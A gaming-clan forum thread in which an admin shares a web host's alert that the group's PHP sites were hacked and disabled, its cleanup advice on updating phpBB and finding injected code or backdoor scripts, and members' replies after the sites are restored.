OUR SITES WERE HACKED!
OUR SITES WERE HACKED!
[nicode 33797247] DreamHost Security Alert - Compromised User
From: DreamHost Security Bot <secalerts@dreamhost.com>View Contact
To: http://www.40calgames.com" onclick="window.open(this.href);return false;
--------------------------------------------------------------------------------
We have noticed hacked processes running under your fortycal user that are indicative of PHP web software installations being hacked. To keep your site and the server secure I have disabled the following domain directories by renaming the domain directory to end in "_DISABLED.." -- please do NOT reinstate the domain until you have thoroughly executed the instructions below:
/home/fortycal/cswargames.com
/home/fortycal/furyclan.com
/home/fortycal/on24cstrike.com
/home/fortycal/reignclan.com
/home/fortycal/cswraith.com
/home/fortycal/cswarlords.com
/home/fortycal/40calgames.com
Most commonly hacking exploits of this nature occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains. To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor. The following site can help you determine if you're running a vulnerable version:
http://secunia.com/advisories/search/" onclick="window.open(this.href);return false;
- phpBB installations should be updated to the current secure release of 3.0.6 or the legacy release 2.0.23.
- Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for other vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory. Also make sure to check ALL of your web software packages (even those not listed) as we are not able to check for everything automatically.
2) Check your software control panel for outdated or unauthorized plugins/mods/components/etc. if applicable. Some exploits can add new plugins/components that continue the infection even if you've updated the core software version. Some plugins can themselves be the source of vulnerability, so it's a good idea to ensure you've got the latest versions possible.
3) Go through all files under the affected user and look for anything that may have been modified or placed by the hacker. It is common for the intruder to place extra <?php> blocks (this is VERY common with these ZenCart hacks!), iframes, javascript <script> tags, etc., frequently at the top or bottom of otherwise legitimate files. Often times this code is obfuscated or encoded such that you cannot tell what it does simply by reading it. Also note that hackers often leave behind shell/backdoor scripts that thy can later use to re-exploit the site even after all other vulnerabilities have been patched. Often these scripts are given innocuous names like "cache.php" or "template.php", or they may be more conspicuous nonsense names or include red flag words like 'shell'.
More general information on this topic is available at the following URL:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites" onclick="window.open(this.href);return false;
If you have any questions, please respond directly to this email.
Thank you for your cooperation!
-Happy DreamHost Security Bot
From: DreamHost Security Bot <secalerts@dreamhost.com>View Contact
To: http://www.40calgames.com" onclick="window.open(this.href);return false;
--------------------------------------------------------------------------------
We have noticed hacked processes running under your fortycal user that are indicative of PHP web software installations being hacked. To keep your site and the server secure I have disabled the following domain directories by renaming the domain directory to end in "_DISABLED.." -- please do NOT reinstate the domain until you have thoroughly executed the instructions below:
/home/fortycal/cswargames.com
/home/fortycal/furyclan.com
/home/fortycal/on24cstrike.com
/home/fortycal/reignclan.com
/home/fortycal/cswraith.com
/home/fortycal/cswarlords.com
/home/fortycal/40calgames.com
Most commonly hacking exploits of this nature occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains. To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor. The following site can help you determine if you're running a vulnerable version:
http://secunia.com/advisories/search/" onclick="window.open(this.href);return false;
- phpBB installations should be updated to the current secure release of 3.0.6 or the legacy release 2.0.23.
- Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for other vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory. Also make sure to check ALL of your web software packages (even those not listed) as we are not able to check for everything automatically.
2) Check your software control panel for outdated or unauthorized plugins/mods/components/etc. if applicable. Some exploits can add new plugins/components that continue the infection even if you've updated the core software version. Some plugins can themselves be the source of vulnerability, so it's a good idea to ensure you've got the latest versions possible.
3) Go through all files under the affected user and look for anything that may have been modified or placed by the hacker. It is common for the intruder to place extra <?php> blocks (this is VERY common with these ZenCart hacks!), iframes, javascript <script> tags, etc., frequently at the top or bottom of otherwise legitimate files. Often times this code is obfuscated or encoded such that you cannot tell what it does simply by reading it. Also note that hackers often leave behind shell/backdoor scripts that thy can later use to re-exploit the site even after all other vulnerabilities have been patched. Often these scripts are given innocuous names like "cache.php" or "template.php", or they may be more conspicuous nonsense names or include red flag words like 'shell'.
More general information on this topic is available at the following URL:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites" onclick="window.open(this.href);return false;
If you have any questions, please respond directly to this email.
Thank you for your cooperation!
-Happy DreamHost Security Bot
Re: OUR SITES WERE HACKED!
after 8 hours of following the instructions....we're back guys!
sammy
sammy
Re: OUR SITES WERE HACKED!
Does this mean I need to change my password?
Re: OUR SITES WERE HACKED!
no..it had nothing to do with you!Belcross wrote:Does this mean I need to change my password?
Re: OUR SITES WERE HACKED!
Thank you sammy!
Re: OUR SITES WERE HACKED!
Thanks Sammy for staying on top of this and keeping us up and running.
Greed will always make you poorer!
Never measure the height of a mountain until you have reached the top. Then you will see how low it was!
Never measure the height of a mountain until you have reached the top. Then you will see how low it was!
Re: OUR SITES WERE HACKED!
if you have the ip of the hacker, use your breadstick.
Re: OUR SITES WERE HACKED!
ahh nice
updated to 3.0.7
updated to 3.0.7
Re: OUR SITES WERE HACKED!
i have deleted the files that you claim as being compromised. but how will i
> know if they are all now safe ?
> i renamed my forum directories back to normal. all seems to be working fine.
> sammy
>
Dreamhost wrote:
A great tool to doubleckeck if there are any lingering problems can be
found online at http://unmaskparasites.com" onclick="window.open(this.href);return false;
I did my own scan for known backdoor shells and did not see any under
your file space.
Glen,
--
- DreamHost Abuse/Security Team
- Terms of Service: http://www.dreamhost.com/tos.html" onclick="window.open(this.href);return false;
- Anti-Spam Policy: http://www.dreamhost.com/spam.html" onclick="window.open(this.href);return false;
- Abuse Center: http://abuse.dreamhost.com" onclick="window.open(this.href);return false;
looks like we're good to go!
sammy
> know if they are all now safe ?
> i renamed my forum directories back to normal. all seems to be working fine.
> sammy
>
Dreamhost wrote:
A great tool to doubleckeck if there are any lingering problems can be
found online at http://unmaskparasites.com" onclick="window.open(this.href);return false;
I did my own scan for known backdoor shells and did not see any under
your file space.
Glen,
--
- DreamHost Abuse/Security Team
- Terms of Service: http://www.dreamhost.com/tos.html" onclick="window.open(this.href);return false;
- Anti-Spam Policy: http://www.dreamhost.com/spam.html" onclick="window.open(this.href);return false;
- Abuse Center: http://abuse.dreamhost.com" onclick="window.open(this.href);return false;
looks like we're good to go!
sammy
Who is online
Users browsing this forum: No registered users and 339 guests